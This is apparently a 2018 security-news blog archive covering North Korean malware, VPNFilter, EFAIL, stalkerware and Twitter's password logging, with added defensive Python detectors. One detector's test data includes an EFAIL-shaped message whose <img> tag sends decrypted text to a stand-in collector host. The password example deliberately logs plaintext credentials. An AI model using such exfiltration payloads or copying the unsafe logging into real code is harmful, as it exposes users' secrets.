Wednesday, May 30, 2018

Big time malware from North Korea can disrupt businesses, maybe hack sites and capture domain names

US-CERT has issued a two-part report (Alert TA18-149A, with accompanying malware analysis reports) on two pieces of HIDDEN COBRA malware: the Joanap backdoor Trojan, a remote access tool, and the Brambul Server Message Block (SMB) worm. Summary here.
HIDDEN COBRA is the US government's name for North Korean government cyber activity, and US-CERT attributes both tools to it; reported victims span several sectors, including media, aerospace, financial and critical infrastructure organizations. The technical description of Joanap is exceptionally detailed. Brambul spreads on its own by brute-forcing SMB logins with a list of passwords embedded in the malware, so weak or reused Windows credentials are what let it move from one machine to the next.
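US-CERT's description of the Brambul SMB worm (spelled "Branbul" above) is that it spreads by guessing Windows logins over SMB from an embedded password list. That leaves a recognisable trace on the victim's Windows Security log: a burst of failed network logons (event 4625, logon type 3) from one source address against many different accounts, sometimes followed by a success (event 4624) for the account whose password was guessed. As an added example, not code from US-CERT or this blog, here is a small Python detector for that pattern. The log records are constructed, in a simplified key=value form whose field names are assumptions for the example rather than a real log schema.

```python
"""Detect SMB password guessing from failed network logons.

Added example; not code from US-CERT or the blog post.  US-CERT describes
Brambul as a worm that brute-forces SMB logins with an embedded password
list, so the trace it leaves on a Windows host is a burst of failed network
logons (Security event 4625, logon type 3) from one source address against
many accounts.  The records below are constructed, in a simplified key=value
form whose field names (ts, event_id, logon_type, source_ip, target_user)
are assumptions for this example, not a real log schema.
"""
from collections import defaultdict
from datetime import datetime, timedelta

FAILED_LOGON = 4625     # an account failed to log on
SUCCESS_LOGON = 4624    # an account was successfully logged on
NETWORK_LOGON = 3       # logon type produced by SMB / NTLM network authentication

# Constructed sample: 10.0.0.5 behaves like a worm guessing many accounts in
# quick succession and then succeeding on "backup"; 10.0.0.9 is one user
# mistyping one password twice, minutes apart; 10.0.0.7 is an interactive
# (console) failure the detector must ignore.
SAMPLE_EVENTS = [
    "ts=2018-05-29T10:00:01 event_id=4625 logon_type=3 source_ip=10.0.0.5 target_user=administrator",
    "ts=2018-05-29T10:00:04 event_id=4625 logon_type=3 source_ip=10.0.0.5 target_user=admin",
    "ts=2018-05-29T10:00:07 event_id=4625 logon_type=3 source_ip=10.0.0.5 target_user=guest",
    "ts=2018-05-29T10:00:10 event_id=4625 logon_type=3 source_ip=10.0.0.5 target_user=backup",
    "ts=2018-05-29T10:00:13 event_id=4625 logon_type=3 source_ip=10.0.0.5 target_user=user1",
    "ts=2018-05-29T10:00:16 event_id=4625 logon_type=3 source_ip=10.0.0.5 target_user=root",
    "ts=2018-05-29T10:00:19 event_id=4624 logon_type=3 source_ip=10.0.0.5 target_user=backup",
    "ts=2018-05-29T10:05:00 event_id=4625 logon_type=3 source_ip=10.0.0.9 target_user=bob",
    "ts=2018-05-29T10:09:30 event_id=4625 logon_type=3 source_ip=10.0.0.9 target_user=bob",
    "ts=2018-05-29T10:10:00 event_id=4625 logon_type=2 source_ip=10.0.0.7 target_user=carol",
]


def parse(line):
    """Turn one key=value record into a dict with typed fields."""
    fields = dict(item.split("=", 1) for item in line.split())
    return {
        "ts": datetime.fromisoformat(fields["ts"]),
        "event_id": int(fields["event_id"]),
        "logon_type": int(fields["logon_type"]),
        "source_ip": fields["source_ip"],
        "target_user": fields["target_user"],
    }


def find_bruteforce_sources(lines, window=timedelta(minutes=1),
                            min_failures=5, min_accounts=3):
    """Map source_ip -> (failures, distinct accounts) for every source whose
    failed network logons, inside some sliding window, meet both thresholds.
    The account threshold separates a worm from one user mistyping a password."""
    by_source = defaultdict(list)
    for line in lines:
        ev = parse(line)
        if ev["event_id"] == FAILED_LOGON and ev["logon_type"] == NETWORK_LOGON:
            by_source[ev["source_ip"]].append(ev)
    hits = {}
    for src, events in by_source.items():
        events.sort(key=lambda e: e["ts"])
        best = None
        start = 0
        for end in range(len(events)):
            while events[end]["ts"] - events[start]["ts"] > window:
                start += 1
            span = events[start:end + 1]
            accounts = {e["target_user"] for e in span}
            if len(span) >= min_failures and len(accounts) >= min_accounts:
                if best is None or len(span) > best[0]:
                    best = (len(span), len(accounts))
        if best is not None:
            hits[src] = best
    return hits


def compromised_accounts(lines, hits):
    """Accounts that logged on successfully over the network from a flagged
    source: the guess that worked, and the first thing to reset."""
    found = set()
    for line in lines:
        ev = parse(line)
        if (ev["event_id"] == SUCCESS_LOGON and ev["logon_type"] == NETWORK_LOGON
                and ev["source_ip"] in hits):
            found.add((ev["source_ip"], ev["target_user"]))
    return found


if __name__ == "__main__":
    hits = find_bruteforce_sources(SAMPLE_EVENTS)
    print("guessing sources:", hits)
    print("accounts to reset:", compromised_accounts(SAMPLE_EVENTS, hits))
```

The thresholds are deliberately loose for the sample; on a real domain controller you would tune the window and counts against normal failure rates, and feed the detector from the 4625 events your SIEM already collects rather than from text lines. The same two events are what US-CERT's mitigation advice for this worm (strong, unique passwords and restricting SMB exposure) is meant to starve.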

I am also aware of instances where a domain, perhaps one with political significance, has been hacked and actually removed from registration, after being replaced with malware bots.  This is likely to be foreign and might be related to North Korea. I’ll report more details when they are available. Trend Micro and Windows Defender have reported detecting this problem.

Friday, May 25, 2018

FBI needs home users to learn router administration skills to defeat determined foreign hackers

The FBI is warning consumers about VPNFilter, malware that infects home and small-office routers and some network-attached storage devices.
The Boston Globe has a typical story here

Rebooting the router (from the power button, or by unplugging and reconnecting it) does not install new firmware. What it does is clear the malware's non-persistent components from memory, which is why the FBI asked everyone to reboot: it temporarily disrupts the malware and helps identify infected devices. But VPNFilter's first stage survives a reboot and can download the rest again, so a reboot alone is not sufficient.
The FBI and US-CERT are therefore encouraging home router users to learn how to sign on to the router's administration page, update its firmware, disable remote management, and replace any default password. This normally takes a web browser and the address and login printed on the router, not shell scripting or operating system knowledge; many routers can fetch and install the vendor's firmware from that page.
ISPs such as Comcast and Cox will presumably have comments on this issue soon.

US Cert has a bulletin on the issue here

Sunday, May 20, 2018

Smart phone tracking and stalking a bigger problem than most people realize

Jennifer Valentino-DeVries has a long article in the New York Times Saturday on smart phone stalking and tracking, here 
There seem to be dozens of apps that make this possible. They are typically installed by someone who briefly has physical access to the victim's phone and then report its location, messages and calls to the installer remotely, so no proximity is needed afterwards.
The problem seems to occur most often in domestic abuse situations.
NBC Washington also presented a report May 17. Fox stations have also reported it.  

Saturday, May 19, 2018

Chrome will suppress "secure icon", simply call out insecure sites in September 2018

Google Chrome will suppress its “secure” label in September for sites served over HTTPS (sites with a valid TLS certificate) but will keep the red “not secure” warning on sites served over plain HTTP.

Mariella Moon writes for Engadget here.
Google really wants to push unencrypted content off the web, even on pages that require no sign-in and collect no data, because a plain-HTTP page can be read and altered in transit by anyone on the network path between reader and server (a public Wi-Fi operator, an ISP, or a state actor). That is the “man in the middle” position, and the concern is not limited to foreign sources.

Monday, May 14, 2018

New concerns surface concerning vulnerabilities in email encryption standards

The Electronic Frontier Foundation has sent out an advisory regarding vulnerabilities (published under the name EFAIL) in the way various email clients handle PGP- and S/MIME-encrypted mail. The article is by Erica Portnoy, Danny O’Brien, and Nate Cardozo. 

Some of the vulnerabilities could let an attacker read encrypted emails you have sent or received in the past: an attacker who has captured the ciphertext embeds it in a new, specially crafted message, and when your client decrypts and displays that message, the recovered plaintext can be sent back to the attacker.
A lot of the public may not feel that this issue is as important as some others.  Most of us encounter encryption when we deal with financial institutions, buy products like annuities, or go through real estate closings with a lot of DocuSign documents, but those services run over HTTPS in a browser and are not what this advisory is about; it concerns end-to-end encrypted email in mail clients such as Thunderbird, Apple Mail and Outlook.

One problem is that some of the vulnerabilities can be triggered merely by opening an email with HTML rendering enabled, without opening any attachment: the crafted HTML makes the client load a remote resource, such as an image, whose URL carries the decrypted text out to the attacker's server. 

The IT departments of insurance companies and banks will be kept especially busy, since the S/MIME side of the problem lands on corporate mail clients.
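As an added example, not code from EFF, the EFAIL researchers or this blog, here is a small Python check for the message shape the HTML point above describes: an encrypted part wrapped in HTML that loads a remote resource. The sample messages, the collector.example.net address and the function names are constructed for the example; the ciphertext is a placeholder, not a real PGP message.

```python
"""Structural check for EFAIL-style "direct exfiltration" mail.

Added example; not code from EFF, the EFAIL researchers or the blog post.
A message is flagged when it carries an encrypted part (PGP/MIME, S/MIME or
inline PGP armor) AND a text/html part of the same message loads a remote
resource.  That is the shape of the published attack: the client decrypts
the ciphertext, renders it inside attacker-supplied HTML, and the remote
load carries the plaintext out inside a URL.  Samples are constructed.
"""
import email
import re
from email import policy

REMOTE_LOAD = re.compile(
    r'<(?:img|link|iframe|object|script)\b[^>]*\b(?:src|href)\s*=\s*["\']?https?://',
    re.IGNORECASE,
)
ENCRYPTED_TYPES = {"application/pgp-encrypted", "application/pkcs7-mime"}
PGP_ARMOR = "-----BEGIN PGP MESSAGE-----"


def analyse(raw):
    """Return {"encrypted", "remote_loads", "suspicious"} for one message."""
    msg = email.message_from_string(raw, policy=policy.default)
    has_encrypted, remote_loads = False, 0
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        payload = part.get_payload(decode=True) or b""
        text = payload.decode(part.get_content_charset() or "utf-8", errors="replace")
        if ctype in ENCRYPTED_TYPES or PGP_ARMOR in text:
            has_encrypted = True
        if ctype == "text/html":
            remote_loads += len(REMOTE_LOAD.findall(text))
    return {"encrypted": has_encrypted, "remote_loads": remote_loads,
            "suspicious": has_encrypted and remote_loads > 0}


# Ordinary PGP/MIME mail: encrypted, no HTML wrapper.
SAFE_PGP_MIME = """\
Content-Type: multipart/encrypted; protocol="application/pgp-encrypted"; boundary="b1"

--b1
Content-Type: application/pgp-encrypted

Version: 1

--b1
Content-Type: application/octet-stream

-----BEGIN PGP MESSAGE-----
hQEMA0ZvbzEyMzQ1Njc4AQf/placeholder-ciphertext
=AbCd
-----END PGP MESSAGE-----

--b1--
"""

# Captured ciphertext re-sent between two HTML fragments: the first opens an
# <img> whose URL is only closed by the second, after the decrypted text.
EFAIL_SHAPED = """\
Content-Type: multipart/mixed; boundary="outer"

--outer
Content-Type: text/html

<img src="http://collector.example.net/log?data=
--outer
Content-Type: multipart/encrypted; protocol="application/pgp-encrypted"; boundary="inner"

--inner
Content-Type: application/pgp-encrypted

Version: 1

--inner
Content-Type: application/octet-stream

-----BEGIN PGP MESSAGE-----
hQEMA0ZvbzEyMzQ1Njc4AQf/placeholder-ciphertext
=AbCd
-----END PGP MESSAGE-----

--inner--
--outer
Content-Type: text/html

">
--outer--
"""

# Plain HTML newsletter with a remote image: remote load, nothing encrypted.
NEWSLETTER = """\
Content-Type: text/html

<p>Hello</p><img src="https://cdn.example.org/banner.png">
"""

if __name__ == "__main__":
    for name, raw in [("safe", SAFE_PGP_MIME), ("efail", EFAIL_SHAPED), ("news", NEWSLETTER)]:
        print(name, analyse(raw))
```

This is a triage signal for a mail gateway or a mailbox audit, not a fix. EFF's advice at the time was to disable or remove the PGP plugins for Thunderbird, Apple Mail and Outlook until patched versions shipped; the EFAIL researchers' short-term mitigation was to decrypt outside the mail client and to turn off HTML rendering or remote content loading, which removes the channel the second condition above depends on.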

Thursday, May 10, 2018

Apple's new "Black Dot of Death": we need a fix quickly

There is a bug in iOS 11 on the iPhone that can cause the Messages app to freeze.  The trigger is a text that hides a very large number of invisible Unicode text-direction characters behind a “black dot” emoji (“the Black Dot of Death”); laying out those characters ties up the app. It is a rendering hang rather than a buffer overflow. 
On Android it only freezes WhatsApp. On the iPhone it freezes the entire Messages app.  It is rather awkward to recover from.

It could be a real problem, for example, if you are waiting for a taxi and getting messages from the taxi company.  (I don’t think it affects Uber.)

Typical story is here

It is a little unclear if it freezes the entire phone or just the Messages app.  The message itself takes a long time to send.

The demonstrator says it is easy to recover by starting a new Messages conversation.  Fox8 in Cleveland says to use Siri. 

The phone can overheat when sending or receiving the message.  Could this become an airline fire hazard?
Apple will surely fix this very soon. 

Wednesday, May 09, 2018

Russian hackers impersonated radical Islam, harassed military spouses online as early as 2015, well before Trump's candidacy and election

AP has an alarming story by Raphael Satter about how Russian hackers impersonated ISIS in text messages and other social media contacts with military spouses, at least as far back as 2015. 

At least one of the spouses was part of Military Partners, an association of partners of LGBT service members, active since the repeal of DADT and also since Obergefell.

But the attack appears to have been part of a Russian troll attempt to spread confusion and dissension, even well before the 2016 elections and even before Donald Trump had announced his candidacy. 
This story bears watching.

Tuesday, May 08, 2018

Phishing emails asking for payment for fictitious loans

Here’s a new one.  I don’t recall getting an email before about a loan I didn’t make.

But I got an email from “” claiming I owe a $19 payment to “accounts receivables”.  There was an attached pdf which I didn’t open. The “.co” refers to Colombia, so that’s suspicious. 

I’ll probably pull credit reports in a few days to make sure there is nothing going on. 

I generally open “suspicious” emails only on the iPhone (apple operating systems don’t seem to be as vulnerable) and don’t open the attachments at all.

“Elastic” does appear, from superficial checking, to be a real company that makes loans. I doubt this email came from them. But I did send this on to Webroot and to Trend Micro to check further. 
I should also mention that I've gotten a few US mail letters offering $100,000 lines of credit (one of them was $500,000).  I've ignored them.  They've never shown up on a credit report. 

Friday, May 04, 2018

Twitter's little password flip; what about Facebook employees and your profiles?

NBC reports both praise and scorn for Twitter:  displeasure at the fact that passwords had been written unhashed to an internal log, where employees with no particular clearance could in principle have read them, but satisfaction that the company disclosed it.
I changed my own on a Windows 10 computer, and it seemed that it started working automatically on my phone.

In IT workplaces, security teams started to implement the idea of “separation of duties” among employees in the late 1980s in mainframe environments.  Programmers normally did not have the right to update production files, but users did. But the maturity to respect security protocols, which protect employees, was slow to develop with many people (apparently including Hillary Clinton).
The Wall Street Journal has a related story on Facebook employees being able to access ordinary users' private profiles.
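Twitter's own disclosure was that it stores passwords hashed with bcrypt, and that a bug wrote the raw password to an internal log before the hash was computed. As an added example, not Twitter's code, here is the failure mode beside the corrected version in Python: the in-memory LOG list and the form field names are assumptions standing in for a real request-logging pipeline, and PBKDF2 from the standard library stands in for bcrypt so the block runs with no extra packages.

```python
"""Hash a password before anything else can record it.

Added example; not Twitter's code.  Twitter's disclosure said it stores
passwords hashed with bcrypt and that a bug wrote the raw password to an
internal log before hashing.  PBKDF2-HMAC-SHA256 from the standard library
is used here so the example runs without extra packages (bcrypt, scrypt or
Argon2 are the usual production choices).  The in-memory LOG list and the
form field names are assumptions standing in for a real logging pipeline.
"""
import base64
import hashlib
import hmac
import os

ITERATIONS = 200_000   # slows down offline guessing; tune to your hardware


def hash_password(password, salt=None):
    """Return a self-describing record: algorithm$iterations$salt$digest."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (
        ITERATIONS,
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(digest).decode("ascii"),
    )


def verify_password(password, stored):
    """Recompute the digest with the stored salt; compare in constant time."""
    _algo, iters, salt_b64, digest_b64 = stored.split("$")
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), base64.b64decode(salt_b64), int(iters)
    )
    return hmac.compare_digest(digest, base64.b64decode(digest_b64))


LOG = []   # stands in for an internal request log that many staff can read


def register_unsafe(form):
    """The failure mode: the whole request, password included, is logged
    before the password is hashed, so the log becomes a plaintext store."""
    LOG.append("signup request: %r" % form)
    return hash_password(form["password"])


def register_safe(form):
    """Hash first, then log only the fields that are safe to retain."""
    stored = hash_password(form["password"])
    LOG.append("signup request: user=%s" % form["username"])
    return stored


def log_contains(secret):
    """True if the secret appears anywhere in the log (what an audit checks)."""
    return any(secret in entry for entry in LOG)


if __name__ == "__main__":
    LOG.clear()
    register_unsafe({"username": "bob", "password": "hunter2"})
    print("unsafe path leaked password:", log_contains("hunter2"))
    LOG.clear()
    record = register_safe({"username": "bob", "password": "hunter2"})
    print("safe path leaked password:", log_contains("hunter2"))
    print("verify correct password:", verify_password("hunter2", record))
```

The point of separating the two paths is that the hash function itself was never the problem at Twitter; the ordering was. Any logging, tracing or crash-reporting that sees the request object before the secret is hashed recreates the same exposure, which is why request loggers should redact credential fields rather than rely on every handler remembering to hash first.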